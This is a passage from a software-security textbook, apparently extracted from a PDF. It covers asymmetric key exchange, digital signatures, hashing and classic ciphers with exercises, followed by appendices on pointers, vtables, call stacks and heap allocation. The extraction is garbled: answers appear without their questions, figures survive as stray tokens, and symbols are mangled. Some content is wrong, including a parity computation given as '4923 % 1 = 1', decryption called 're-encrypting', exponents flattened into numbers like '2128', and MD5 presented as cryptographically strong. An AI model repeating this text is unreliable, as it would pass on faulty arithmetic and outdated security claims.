1. In this scenario, Bob wishes to receive an encrypted message from Alice. Alice,
announcing to the world that she is willing to participate in a key exchange,
generates a private (K-) and a public key (K+) using an asymmetric algorithm such
as RSA. She keeps the private key to herself but shares her public key on her web
page. This sharing of the public key is represented with the top-most arrow in the
above figure.
2. Bob generates a cryptographically strong symmetric key (such as a 128-bit AES
key) and encrypts it using Alice’s public key using RSA. This means that only Alice
can re-encrypt the 128-bit AES key. Bob cannot even verify that the 128-bit AES
key was encrypted correctly! Bob sends this 128-bit AES key (encrypted using
Alice’s public RSA key) to Alice. Alice, receiving this message, re-encrypts it with
her private key. Now she can see the 128-bit AES key in plaintext. We can see this
exchange in the second arrow in the above figure. Notice how Bob encrypts the
key with Alice’s public key C+(KAES, K+) and Alice decrypts the message with her
private key C-(KC, K-).
3. Now that the AES key has been successfully exchanged, Alice and Bob can pass
messages back and forth without worrying about Eve intercepting or modifying
them. Here they use the AES key KAES for both encrypting and decrypting the
messages because AES keys are symmetric.
The question remains: is this key exchange secure? Is there any way that Eve can
intercept the key, alter a message, or read an encrypted message? Well, in the
first message, Eve can intercept and read the public key distributed to Bob. She
can even alter it before Bob reaches it. However, this key does not give Eve the
ability to read Kc that Bob sends to Alice because a public key does not give you
the ability to decrypt the message. Furthermore, if Eve were to alter K+ before
Bob reaches it, it would simply result in an unreadable message to Alice. In other
words, Bob would probably need to begin the key exchange process anew.
288 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Certification
In our third scenario, we wish to have a secure communication with an online
merchant. In other words, Alice would like to purchase something from Bob’s
store. Eve will wish to get Alice’s credit card number or perhaps have her order
diverted. The big question is: how will Alice know that she is interacting with Bob’s
store and not a fake store set up by Eve? To accomplish this, Alice needs a
certification which verifies her store is what she claims it to be.
K+ CA K+
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 289
Integrity
The final common application of encryption technology is to verify file or message
integrity. In other words, we would like some assurances that a message comes
from who we think it came from and has not been changed. Ideally, this is to be
accomplished without incurring the cost of encrypting the entire message. This
can be done with a digital signature.
A digital signature is a small appendix added to a message or file that verifies that
the message in its entirety has been created by a given author. This will be
explained in several steps, each of which adding a degree of integrity assurance
to Alice and Bob.
Step 1: Polarity Bit
Consider a message consisting of a collection of 1’s and 0’s. A polarity bit verifies
the integrity of a message by counting the number of 1’s in the message. If there
are an odd number of 1’s, then a 1 is appended onto the end of the message. If
there are an even number of 1’s, then a 0 is appended. This way, one can verify
that the resulting block of data always has an even number of 1’s (the message
plus the polarity bit). In this case, there are 4923 1’s so the polarity bit is 1:
polarityBit = 4923 % 1
= 1
This is great for detecting whether a single bit has changed, but will not be able
to detect if 2 bits have been changed. In fact, all changes involving an even
number of bits will not be detected. The problem is even worse than this. If Eve
were to replace the file completely with a new counterfeit file, there is a 50%
chance that the checksum would validate the file. Clearly, this is an incomplete
solution.
Step 2: Checksum
We could add additional assurances by using a checksum. This is a number
representing the sum of digits in a given file or message. For example, consider a
message that is 1024 bytes in length and a checksum that is 1 byte in length. We
count all the 1’s in the file and discover that there are 4923. The checksum is then
computed with:
checksum = 4923 % 256
= 59
Notice that we mod (modular division) the number of 1’s by the maximum size of
the checksum (1 byte is 8 bits so there are 28 or 256 possible values).
Since the checksum is 1 byte in size, there are 256 possible values. Thus the
chance of a random file matching the checksum is 1:256. If we increase the
checksum to 4 bytes, then the chance of a random file matching is 1:232. This may
seem like a great deal of security, but it is not. Checksum will detect whether a
bit was added or removed, but will not detect whether a bit was moved from one
position to another. In other words, 01100 has the same checksum as 00011.
Step 3: MD5
A hash function is a function that returns a given token called a hash value or
digest from a message. This is most useful when the message is much larger than
290 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
the digest. Thus the polarity bit and the checksum are examples of hash functions
and digests.
MD5 is the latest in a collection of message-digest algorithms (previous
incarnations were MD4, MD3, and so on) designed to provide cryptographically
strong digests. Other cryptographic hash functions commonly used include SHA-
1 and BLAKE2b. MD5 has a 128-bit digest, meaning the chance of a random
message matching a given digest is 1:2128. Furthermore, cryptographic hash
functions are designed in such a way that trans-positioning bits, changing
message length, or changing bits results in a unique digest.
While an MD5 digest does add a large amount of confidence that a message was
not accidentally altered, it provides no assurance that Eve did not maliciously
alter the message. This is because MD5 is a known and published algorithm
requiring no password. Clearly we are not finished yet.
Step 4: Digital Signature
A digital signature is the combination of a cryptographically strong hash function
with asymmetric encryption. The idea is very straightforward:
K+
1
Alice then encrypts the digest with her private key generating an encrypted
digest. This digest is now Dc because it is ciphertext.
Dc = C+(Dpdf, K-)
4. Alice sends the message and the digest to Bob. At this point, it does not matter
whether Mpdf and Dc are in one file or two. Most modern file formats such as PDF
and DOCX allow the digest to be embedded in the file.
5. Bob receives the PDF and is unsure who authored the message (Alice or Eve) and
is unsure if Eve has altered the message while it was in transit. However, upon
opening the file, Bob notices the digital signature. He creates his own digest D on
the Mpdf and then verifies that against the digest he decrypted from Alice’s public
key C-(Dc, K+).
MD5(Mdpf) ÅÆ C-(Dc, K+)
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 291
There are a few things to notice about this scenario. The first is that the message
itself is not encrypted. Bob can choose to read the message without bothering to
verify that the message came from Alice or that the message was not changed by
Eve. This differs significantly from the Identification of Authorship scenario
presented earlier.
The second thing is that Bob can verify that the digest sent by Alice is authentic
and matches the message, but cannot generate his own digest. This is because
Alice used an asymmetric algorithm and did not share with Bob the private key.
The final thing to notice is that Alice’s public key could be intercepted and
changed by Eve. This means she might need to use a certification mechanism to
distribute her public key. In other words, the cryptographic scenarios are often
combined to meet the confidentiality and integrity needs of the client.
292 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Examples
1. Q Classify the following scenario as steganography or cryptography: I authenticate
on my bank’s web site.
A If the user navigates to the login page, then all the world knows they are going
to be sending a password over the wire next. In other words, the existence of
the message is not hidden. Instead we wish to keep the password itself
confidential. This is cryptography.
A Many of the parables Jesus shared with the people were directed against the
religious and civil leaders of His day. One could argue that these leaders were
unaware a message was contained therein. If this is true, then the parables
would be steganography because the existence of the message was hidden.
A Asymmetric. If it were symmetric, then the same key could be used to decrypt
the message. Since the message cannot be decrypted, it is asymmetric.
A Symmetric. The message is read the same way it is written: by holding a mirror
up to it.
A Known plaintext. Though she did not know what the message said, she knew
the message was in English. Therefore she was able to recognize the plaintext
when it emerged.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 293
6. Q Classify the following scenario as a chosen plaintext attack, a known plaintext
attack, or a ciphertext only attack: I encounter a stream of ciphertext being sent
over Wi-Fi from my neighbor’s house. Being nosey, I decide to crack it so I can
read his mail.
A Known plaintext. I do not have access to the key so I cannot generate more
messages at my leisure. However, I can tell when I guess the key because the
messages will suddenly be in English.
A Chosen plaintext. Because I am able to specify the plaintext and I can then look
through the ciphertext for the message; this is a chosen plaintext attack.
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet reversed.
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Z Y X W V U T S R Q P O N M L K J I H G F E D C B A
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row. The solution is:
“ZGYZHS”
9. Q Encrypt the message “CAESAR” with the Caesar Cipher using the password +3
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet shifted by three.
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row. The solution is:
“FDHVDU”.
294 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
10. Q Encrypt the message “ALBERTI” with the polyalphabetic algorithm using the
password +3 -1 +10 -5 +1
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet shifted right by three, and the third row is left shifted
by one, and so on:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row, then third row,
then fourth row, and so on. The solution is: “DKLZSWH”
11. Q Encrypt the message “book” with the book cipher using the following run of text
as the key (where the first column and the first row are to serve as guides in
counting):
A 012345678901234567890123456789012345678901234567890123456789
000 A book cipher is a cipher where the plaintext message is con
060 verted to ciphertext through the user of a key and a large v
120 olume of text (Leighton & Matyas, 1984). The key serves as i
180 nstructions for picking the ciphertext from the volume. Ther
240 e have been a large number of book cipher algorithms used th
300 rough the years, each with varying degrees of practicality a
360 nd security. The first was proposed in 1586 by Blaise de Vig
420 enere where a transparent sheet of paper was placed over a v
480 olume of text. Alice would then circle the letters or words
540 of the plaintext on the transparent sheet. In this case, the
600 ciphertext is the transparent sheet and the key is the volu
660 me of text.
Note that there are many possible solutions. We need to first find some instance
of “b” in the text. Once this is found, we will write down the offset from the
beginning. There is a b at position 270 (5th row, in the word “book”). Once we
have done this, we will cross it out so we won't re-use that value. Now we will
find an instance of “o”. It is preferable that it is after the previous value we
looked up so we won't repeat codes. In this case, the value is in position 285 (5th
row in the word “algorithms”). Now we will look for another letter “o”. There is
one in position 480 in the word “volume”). The final letter is “k” to be found in
position 645 in the word “key.” Thus a valid ciphertext is: “270 285 480 645”.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 295
12. Q Write a function to implement the polyalphabetic encryption algorithm. The
input is plaintext, the output is ciphertext, and the password is a string.
string encryptMulti(const string & source, const string & password);
A Note that most people expect the output to consist of printable characters. It
would not do if the ciphertext for a given character was a NULL, resulting in the
premature termination of a string.
const char ALPHABET[] =
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
"1234567890"\
" ~!@#$%^&*(),./<>?;':\"[]{}\\|";
const int SIZE = sizeof(ALPHABET) - 1;
/*****************************************************
* INDEX FROM ALPHABET
* Find the offset of a character in the ALPHABET string
*******************************************************/
int indexFromAlphabet(char letter)
{
for (const char * p = ALPHABET; *p; p++)
if (*p == letter)
return (int)(p - ALPHABET);
return 0;
}
13. Q If I have a key size of 8 bits, how many possible passwords are there?
296 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
14. Q Which has a larger key size: DES or AES?
A DES has a fixed key size of 56 bits. AES has a variable key size of 128, 192, or 256
bits. Thus even the weakest AES key is stronger than DES.
15. Q How many possible keys must be tried using the brute-force method to crack a
128-bit AES message?
A Using a standard brute-force attack, all 2128 keys will need to be tried. This is
340,282,366,920,938,463,463,374,607,431,768,211,456 or 3.4 x 1038.
If we take advantage of a theoretical weakness, the key strength is reduced to
2110.5 which is roughly 1.8 x 1033. This is about 200,000 times easier to crack.
16. Q What would be a 1-bit, 2-bit, and 3-bit check-sum for the following ASCII
message: “Signature”?
Note that 83 for capitol ‘s' in binary is “01010011” which has four 1’s. When we
look at the complete bit-stream for “Signature", we get:
01010011 01101001 01100111 01101110 01100001 01110100 01110101 01110010
01100101
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 297
Exercises
1 I keep my grades in an encrypted Excel spreadsheet on a USB thumb drive.
Describe Alice, Bob, and Eve in this scenario.
5 From memory, list all you know about the following encryption algorithms:
x ATBASH
x Caesar Cipher
x Polyalphabetic
x XOR
x Enigma
6 Decrypt the following message that was encrypted with +3 using the Caesar
Cipher
VHFXULWB
7 Decrypt the following message that was encrypted with a book cipher where
the key is “Proverbs 3” from the King James version of the Old Testament:
50 216 55 23 9 27 10 96 72 59 216 101
9 How many guesses will it take to crack a message of Russian Cyrillic text? (Hint:
how many characters are there in the Cyrillic alphabet?)
11 From memory, list and define the major encryption algorithms. What are their
defining characteristics?
298 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
12 Which encryption algorithm would be useful for a Digital Signature?
x DES
x Vigenere
x Book
x Blowfish
x RSA
x Multi-Alphabet
x AES
13 If I use a 1-bit hash, how much change in the message can be detected? In other
words, how close can two different messages be and still have the same hash?
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 299
Problems
1 List and describe five ways to hide a message using steganography.
3 Is the Golden Bug ration the same for all languages? Explain your rationale.
8 Research another encryption algorithm that is used today. Provide at least one
good reference describing this algorithm.
x What are its properties?
x For what types of applications might one use this algorithm?
x Which of the algorithms mentioned in this chapter are most similar to the
one you found?
300 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
9 If the message is a 32-bit number, how large must the hash be to be “absolutely
secure?” In other words, what size must the hash be so that any change to the
message can be detected?
10 If the message is an 8 letter ASCII password, how large must the hash be to be
“absolutely secure?” In other words, how large must the hash be so that any
change in the message can be detected by the recipient?
11 If the message is a 1k paragraph, how large must the hash be so the attacker
has a “one in a million” chance of changing the message without being
detected?
12 Research Bitcoins. They use private key encryption and cryptographically strong
hash algorithms in an interesting and unique way. Draw a figure describing how
data is transferred and what processes are used. Also, describe the main
concepts such as the ledger, a block chain, and a transaction in terms of the
concepts presented in this chapter.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 301
Appendix
7 4 2 9 3 1 8 2 9 1 2
Figure A.1: How an array is stored in memory with most programming languages
Consider the first element in an array. We can access this item two ways:
cout << "array[0] == " << array[0] << endl;
cout << "*array == " << *array << endl;
assert(array[0] == *array);
The first output line will of course display the value 7. The second will dereference
the array pointer, yielding the value it points to. Since pointers to arrays always
point to the first item, this too will give us the value 7. In other words, there is no
difference between *array and array[0]; they are the same thing!
Similarly, consider the 6th item in the list. We can access it with:
cout << "array[5] == " << array[5] << endl;
cout << "*(array + 5) == " << *(array + 5) << endl;
assert(array[5] == *(array + 5));
This is somewhat more complicated. We know the 6th item in the list can be
accessed with array[5] (remembering that we start counting with zero instead
of one). The next statement (with *(array + 5) instead of array[5]) may be
counterintuitive. Since we can point to the 6th item on the list by adding five to
the base pointer (array + 5), then by dereferencing the resulting pointer we get
the data:
array array + 5
7 4 2 9 3 1 8 2 9 1 2
array[5]
Figure A.2: How array indexing is implemented with most programming languages
Therefore we can access any member of an array using either the square bracket
notation or the star-parentheses notation.
All variables reside in memory. We can retrieve the address of a variable with the
address-of operator:
{
int data; // “data” resides in memory
cout << &data << endl; // “&data” will return the address of “data”
}
It turns out that functions also reside in memory. We can retrieve the address of
a function, store the address of a function, and de-reference the address of a
function in much the same way we do other pointers.
Note how we do not include the ()s here. When we put the parentheses after a
function, we are indicating we want to call the function.
int main()
{
void (*p)(double); // pointer to a function. Variable ‘p’
This is an error. In this case, the order of operations for the parentheses () is
before that of the dereference operator *. As a result, the compiler thinks you
are calling a function named p() returning a pointer which is to be dereferenced.
To make your intentions clear, a slightly more heavy syntax is required:
(*p)(value); // CORRECT, though the p(value) convention is more convenient
In this case, we are first dereferencing the pointer variable p before attempting
to call the function, exactly what is needed. It turns out that the dereference
operator (*) is optional here. As long as there is not another function named p,
we can simply say:
p(value); // CORRECT, though one might expect to need the * to dereference ‘p’
Observe how the first parameter p is a function pointer. The easiest way to call
this function is by specifying the address of the target function directly:
{
function(display, 3.14159); // we could also say function(&display, 3.14159);
}
Now, to add these three member functions to Card, we need to add three
function pointers:
struct Card
{
int card;
void (*set )( Card * pThis, int iSuit, int iRank);
int (*getRank)(const Card * pThis);
int (*getSuit)(const Card * pThis);
};
The final step is to instantiate a card object. This means it will be necessary to
initialize all the member variables. Unfortunately, this is a bit tedious:
{
Card cardAce;
cardAce.set = &set; // this is tedious. Every time we want to
cardAce.getRank = &getRank; // instantiate a card object, we need to
cardAce.getSuit = &getSuit; // hook up all these function pointers!
From here, we can create a single global instance of VTableCard to which all Card
objects will point:
const VTableCard V_TABLE_CARD = // global const for all Card objects
{
&set, &getRank, &getSuit // here we hook up all the function pointers
}; // once, when we instantiate V_TABLE_CARD
So how does this change the use of the Card class? Well, instantiating a Card
object becomes much easier but the syntax for accessing the member functions
is much more complex:
{
Card cardAce;
cardAce.__vtptr = &V_TABLE_CARD; // with one line, all the function pointers
// are connected in a single command
cardAce.__vtptr->set(&cardAce, 3, 0);
}
Note that while __vtptr is a member variable of Card and, as such, requires the
dot operator, however, __vtptr itself is a pointer. It is necessary to either
dereference it with the dereference operator * or use the arrow operator ->
when accessing its member variables.
1 8 9 0
1000
0+ 8
800 + 90 + 0 = 1890
Figure D.1: How to convert an array of digits into an integer
Thus we can store the number 1890 as:
int num[] = { 1, 8, 9, 0 };
Since computers are fundamentally binary, we don’t use an array of digits but
rather an array of bits. This means that each place in the array does not
correspond to a power of 10 (for digits) but rather a power of 2 (for binary). The
same number would be:
ͳͺͻͲ ൌ ʹଵ ʹଽ ʹ଼ ʹ ʹହ ʹଵ
If we were to write this out as an array of bits, it would be:
10 9 8 7 6 5 4
2 2 2 2 2 2 2 23 22 21 20
1 1 1 0 1 1 0 0 0 1 0
1024
4+ 512
2 + 256
6+ 0 + 64 + 32 + 0 + 0 + 0 + 2 + 0 = 1890
Figure D.2: How to convert an array of bits into an integer
Thus we can store the number 1890 as:
bool num[] =
{
true, true, true, false, true, true, false, false, false, true, false
};
The next problem we need to address is how to handle negative numbers. On the
surface, this seems rather trivial. We will define a structure which consists of an
array of Boolean values plus a Boolean sign variable.
struct Integer
{
bool array[31]; // for the array of bits
bool isNegative; // for negative numbers
};
There is a problem with this approach: there are two different representations
for zero. The first would be an array of all zeros and isNegative == false. The
second would be an array of all zeros with isNegative == true. Since -0 == 0,
these two different integer representations would represent the same thing. In
other words, I would have to do more than just compare the member variables
0 0 1 0 0 1 0 1
0 + 0 + 32 + 0 + 0 + 4 + 0 + 1 = 37
Figure D.3: Convert an array of bits into an integer
2. Find the complement of all the bits:
1 1 0 1 1 0 1 0
Figure D.4: Invert (find the complement of) the bits
3. Add 1.
1 1 0 1 1 0 1 1
Figure D.5: Adding one completes the 2’s complement where the first bit is the sign (+/-)
Notice how the left-most bit is 1, indicating the number is negative. We mark this
bit as shaded to emphasize that it is special: it indicates the number is negative.
This binary representation of signed (positive or negative) numbers has several
desirable properties:
Unique Zero First, there is only one 0 value. In other words, we don’t run into the strange -0
!= 0 problem which was discussed previously.
Negative Bit Second, it is easy to tell whether a number is negative: just check the left-most
bit.
Zero is 0x00 Third, zero is represented as all 0’s, which is the same test used for Boolean
values.
Increment & Decrement Finally, the increment and decrement operations work exactly the same for
signed numbers as they do for unsigned numbers.
-3 1 1 1 1 1 1 0 1
-2 1 1 1 1 1 1 1 0
-1 1 1 1 1 1 1 1 1
0 0 0 0 0 0 0 0 0
1 0 0 0 0 0 0 0 1
2 0 0 0 0 0 0 1 0
3 0 0 0 0 0 0 1 1
4 0 0 0 0 0 1 0 0
An interesting thing happens when we get to the end of a number. Here, with our
8-bit signed integer, we represent the value 127 as:
Decimal Binary
127 0 1 1 1 1 1 1 1
main
board, xTurn
interact clearBoard
cle
fileName
board bo
board
xTurn xTurn
x
xT
Display Display board editSquare getText
Options Board fileName row
symbol col
Convert Get
readBoard writeBoard
Symbol Coordinates
Stack
In our Tic-Tac-Toe program, consider the moment in time when program
main execution is in getCoordinates(). After this function is finished executing, which
function will take control? The answer is editSquare() because editSquare()
board is the function that called getCoordinates(). How would one store this
xTurn
execution order so, whenever a function returns, we know which function to give
interact control to? Through inspection of this problem, it should be clear that we are
following a last-in, first-out execution sequence. The last function that is executed
board
xTurn is the first function to be removed from our collection of function names.
Similarly, the first function executed (main() for C or C++ programs) is the first
editSquare function added to our collection and is the last to be removed. What data
structure maintains first-in-last-out (or alternatively last-in-first-out)? The answer
row
col is a stack.
getCoordinates
interact We call the collection of functions that are called at a given moment in time the
“call stack.” From our previous example, when getCoordinates() is being
editSquare
executed, we can see that it was called from editSquare() which was called by
getCoordinates interact() which was called from main(). Note that main() was called from
the operating system (OS).
When we call a function, we simply push the name of the function onto the stack
and when we return out of a function, we pop the function off the stack:
class CallStack
{
private:
stack <string> callStack;
public:
// start by pushing "main" for C and C++ programs
CallStack() { callStack.push("main"); }
// returning from a function pops the name off the call stack
void returnFromFunction()
{
callStack.pop();
}
Finally, we can see what function will be executed when we return out of
getCoordiantes():
{
callStack.returnFromFunction(c);
cout << callStack.getCurrentFunctionName(); // editSquare
}
Here we can see that, after getCoordinates() gets called, we return execution
to editSquare(). After editSquare() returns, we go to a location in
interact(). This continues until main() returns. When that happens, control
returns to the operating system.
0x92015731 points to somewhere in the OS
0x04019732 points to main()
0x04015314 points to interact()
0x04017432 points to editSquare()
Figure E.3: The call stack where each element is a return pointer
class CallStack
{
private:
stack <void *> callStack;
public:
// start by pushing the ip of the operating system onto the call stack
CallStack(void * ip) { callStack.push(ip); }
// calling a function pushes the instruction pointer onto the call stack
void callFunction(void * ip)
{
callStack.push(ip);
}
// returning from a function pops the ip off the call stack and returns it
void * returnFromFunction()
{
void * ip = callStack.top();
callStack.pop();
return ip;
}
};
Notice how we save our current IP in the stack and set the next value to the
address of the called function. Returning from a function is much easier:
ip = callStack.returnFunction();
There is one huge complication to this local variable problem: we cannot depend
on the space requirements for all the functions in a program to be the same. For
example, in our Tic-Tac-Toe program, main() requires nine bytes of memory for
the board local variable and an additional one byte for the xTurn local variable.
However, interact() has only a single integer requiring four bytes. This means
that if we attempt to push the local variables onto our call stack, the elements in
the call stack will be of a different size. How can we accomplish this?
There are three main solutions to representing a stack with variable size
elements. The first is to have each element be the same size but it refers to
memory allocated elsewhere that contains the variable amount of space. The
second is to remember the size of each element and push that value onto the
stack. Most stack implementations do neither of these and follow a third
implementation. They push on a value called a frame pointer. This pointer
functions like a linked-list and points to the next “frame” or element in the stack.
Frame pointer
Return address points to main
interact Local variables
for interact()
Frame pointer
Return address points to interact
Frame pointer
Figure E.5: Call stack with local variables, frame pointers, and return addresses
This frame pointer makes the stack operate like a linked list. When a new function
is pushed onto the call stack, three things are added: the return address, the local
variables, and the frame pointer. As mentioned earlier, the return address refers
to the next instruction to be executed after the function is finished. The local
variables include all the variables necessary for the function to execute as well as
all the parameters in the function. This local variable area can be just about any
size. Finally, the frame pointer refers points to the frame pointer in the previous
function in the call stack. This enables the program to remove a given function
from the call stack when it is complete.
interact(board, xTurn);
return 0;
}
Frame pointer
Return address points to the operating system
main board
padding
Frame pointer
editSquare(board);
Frame pointer
Return address points to the operating system
main board
padding
Frame pointer
Return address points to main
interact board pointer
padding
Frame pointer
Frame pointer
Return address points to the operating system
main board
padding
Frame pointer
Return address points to main
interact board pointer
padding
Frame pointer
Return address points to interact
board pointer
editSquare xValue
yValue
counter
Frame pointer
Frame pointer
Return address points to the operating system
main board
padding
Frame pointer
Return address points to main
interact board pointer
padding
Frame pointer
Figure E.9: Call stack after editSquare() returns control back to interact()
We will write a simple program to display the contents of the call stack:
Array-Based Heap
Consider a program where all heap allocations are exactly the same size. If the
heap request resulted in a chunk of size 1024 bytes and each heap allocation
block was exactly 64 bytes, then eight allocations would be possible. This could
be managed with a simple Boolean array where each Boolean refers to whether
a given block of memory is utilized.
bool blocks[NUM_BLOCKS];
To allocate memory, it is necessary to traverse the blocks array and look for a
false slot. When it is found, mark it as busy by setting the slot to true and return
the corresponding block of memory.
void * alloc()
{
for (int i = 0; i < NUM_BLOCK; i++)
if (blocks[i] == false)
{
blocks[i] = true;
return heap + (i * SIZE_BLOCK);
}
return NULL;
}
Because all blocks are the same size, we can simply sub-divide the heap into
blocks and index into them using an array of Booleans. This is very fast and
efficient, but only works when the blocks are the same size. When they are not,
a linked list implementation is required.
MCB
MCB
MCB
Doug Lea
Doug Lea implemented a widely used heap management system that can be
considered the ancestor of most modern systems. Doug used a doubly-linked list
to connect blocks of memory in the heap. The UML class diagram is:
MCB
size
sizePrev
isFree
Note that the size is used rather than a pointer. This is because all the nodes in
this linked list are in the same continuous heap and they are in order. Thus the
size variable can be much smaller than a pointer; it only needs to be able to
address the maximum size of a chunk of memory. This, combined with the fact
that the minimal size of a chunk is typically 8 bytes (taking 3 bits to represent),
MCB
MCB
MCB
MCB
MCB
free free free
MCB
MCB
MCB
MCB
MCB
free free
Example
To illustrate how the Doug Lea heap model works, we will walk through a scenario
where we have a 1024-byte heap and an 8-byte MCB. The heap starts empty.
1024 bytes
MCB
1016 free
The FLINK and BLINK (Forward LINK and Backward LINK, a doubly linked list
connecting all the free blocks) are both set to NULL because they are at the end
of the linked list.
1024 bytes
MCB
MCB
32 976 free
The second refers to the free block of 976 bytes (1024 – 2x8 – 32):
mcbF.size = 976 mcbF.sizePrev = 32 mcbF.isFree = true
Since we only have one free block, the FLINK and BLINK are still NULL pointers so
the doubly linked list still has only one node in it.
Next we will allocate two more blocks of memory, 256 bytes and 8 bytes:
char * data2 = new char[256]; // allocate 256 bytes
int * date3 = new int; // allocate 8 bytes
1024 bytes
MCB
MCB
MCB
MCB
Notice that we have consumed 296 bytes of memory for program usage (32 + 256
+ 8 = 296) and 32 bytes for MCBs (4 x 8 = 32). This means we have 696 bytes
remaining (1024 – 296 – 32 = 696). Also notice that we still only have one block
of free memory. Therefore our FLINK and BLINK pointers are still NULL.
1024 bytes
MCB
MCB
MCB
MCB
32 256 free 8 696 free
However, our doubly linked-list of free blocks has gotten more complex. The
FLINK pointer (forward link) of the first free block now points to the second block
and the BLINK pointer (backward link) of the second free block now points to the
first block.
We will make one final modification to our heap. We will make another allocation.
To do this, we will go through our linked-list of free blocks and find the first one
which has enough space. We will then take just enough space and mark the rest
as free. Since we are only allocating 64 bytes, this will leave most unused.
double * data4 = new double[4]; // doubles are 16 bytes on this computer
1024 bytes
MCB
MCB
MCB
MCB
MCB
We still only have two blocks in our free linked-list: one of 184 bytes and another
at 696 bytes.
Application
managed
heap
Code of Ethics
Because ethics and morality are the fundamental distinction between white hats
and black hats, each of us should read these two documents so we can get a
clearer picture of which types of behavior are acceptable and which are not.
(ISC)². (2017). (ISC)² Code Of Ethics. Retrieved from International Info System Security Certification
Consortium: Retrieved from: https://www.isc2.org/Ethics
ACM. (1992, October 16). ACM Code of Ethics and Professional Conduct. Retrieved from Association for
Computing Machinery: http://www.acm.org/about-acm/acm-code-of-ethics-and-professional-conduct
(ISC)². (2017). (ISC)² Code Of Ethics. Retrieved from International Info System Security Certification
Consortium: https://www.isc2.org/Ethics
ACM. (1992, October 16). ACM Code of Ethics and Professional Conduct. Retrieved from Association for
Computing Machinery: http://www.acm.org/about-acm/acm-code-of-ethics-and-professional-
conduct
Ahmad, D. (2003). The Rising Threat of Vulnerabilities Due To Integer Errors. IEEE Security & Privacy, 77-
82.
Anderson, R., & Petitcolas, F. (1998). On the Limits of Steganography. IEEE Journal of Selected Areas in
Communications, 16(4), 474-4481.
Bartik, M., Bassiri, B., & Lindiakos, F. (n.d.). Exploiting Format String Vulnerabilities for Fun and Profit.
Bell, D., & LaPadula, L. (1973). Secure Computer Systems: A Mathematical Model. MITRE Technical
Report 2547.
Ben-Itzhak, Y. (2009). Organized Cybercrime and Payment Cards. Card Technology Today, 10-11.
Bezroukov, N. (1999, February 11). CONCEPT virus. Retrieved from Soft Panorama:
http://www.softpanorama.org/Malware/Malware_defense_history/Ch05_macro_viruses/Zoo/c
oncept.shtml
Biba, K. (1975). Integrity Considerations for Secure Computer Systems. MITRE Technical Report 3153.
Brin, S., & Page, L. (1998, April 1). The Anatomy of a Large-Scale Hypertextual Web Search Engine.
Proceedings of the Seventh International Conference on World Wide Web 7, 30, 107-117.
Caloyannides, M. (2003, May). Society Cannot Function Without Privacy. IEEE Security and Privacy, 1(3),
84-86.
Champeon, S. (2000, May 1). XSS, Trust, and Barney. Retrieved from Hesketh:
http://www.hesketh.com/publications/xss_trust_and_barney.html
Cialdini, R. (2006). Influence: The Psychology of Persuasion. New York: Harper Business.
Clark, D., & Wilson, D. (1987). A Comparison of Commercial and Military Computer Security Policies.
Security and Privacy, 1987 IEEE Symposium (pp. 184-184). IEEE.
Donnelly, M. (2000). An Introduction to LDAP. Retrieved from LDAP Man.org:
http://www.ldapman.org/articles/intro_to_ldap.html
Farrell, H. (2003). Constructing the International Foundations of E-Commerce—The EU-U.S. Safe Harbor
Arrangement. International Organization, 57(2), 277-306. doi:10.1017/S0020818303572022
Gabrilovich, E., & Gontmakher, A. (2002). The Homograph Attack. Communications of the ACM, 45(2),
128.
Gordon, S. (1999, June). Viruses in the Information Age. Retrieved from Virus Bulletin:
http://www.badguys.org/vb3part.htm